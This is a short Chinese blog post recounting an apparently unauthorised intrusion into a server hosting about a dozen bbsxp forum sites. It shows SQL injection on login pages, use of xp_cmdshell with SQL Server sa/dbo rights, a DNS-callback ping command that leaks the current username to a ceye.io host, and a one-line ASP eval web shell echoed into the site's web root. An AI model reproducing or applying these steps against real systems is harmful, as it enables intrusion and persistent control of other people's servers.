sqlserver sa权限的一次渗透

0x01

今天朋友发了个站 , 和他一起搞了一个下午. 想想把过程记录起来 也是个不错的选择!

环境如下:

服务器上有十来个网站 分别是asp/aspx/php 类型的站. 数据库 access sqlserver 都有使用 , 所有站点全部用的一套程序经laot发现是 bbsxp 一款相当有年代感的论坛程序.

0x02

发现了基本上所有网站登陆口处都有明显的sql注入存在 ,

1.jpg

经判断,发现是sqlserver 2008 的版本 前面根据iis的版本为7.5 初步判定服务器为windows2008 R2 这里有个巨坑,就是这个注入点是报错型注入.但是你输入的sql语句有很大的几率不会报错… 每次都需要执行很多遍,才会把执行结果报错出来...导致这里浪费了很长一段时间 后面吃了饭回来想了想,我记得用户好像是dbo权限… 死马当作活马医. 试试 xp_cmdshell 扩展执行命令… 但是这种注入点是无法回显执行命令的结果的…(当然是有其他办法的) 这里有个小技巧,就是通过dnslog来判断是否真的执行了命令. 这里我用CEYE平台做的测试 windows通过 ping %USERNAME%.xxx.ceye.io 来判断是否真的执行了命令,并且回显当前用户 当然windows下面还有很多类似于这种系统变量… (具体百度吧,骚年)

2.jpg

当看见是system的时候,基本可以断定sqlserver没有被降权,很开心♪(^∇^*)啦啦~~~

当时和laot弹了半天的powershell 没有上线,不知道咋回事 后面想了想直接echo呀….刚好他iis暴露了网站绝对路径…. 直接 echo ^<% eval(REQUEST["t"]%^> 进去就搞定了… 收工!

结尾

没什么技术含量,最重要就是别忘记各种技巧和思路…. 有时候一条思路走不通的时候,多换换其他的,没准就有意想不到的结果

本文链接:

http://www.hentai6.cn/index.php/archives/6/
1 + 4 =
1 评论
    aaChrome 77Windows 10
    2019年09月29日 回复

    为什么没人管管网贷。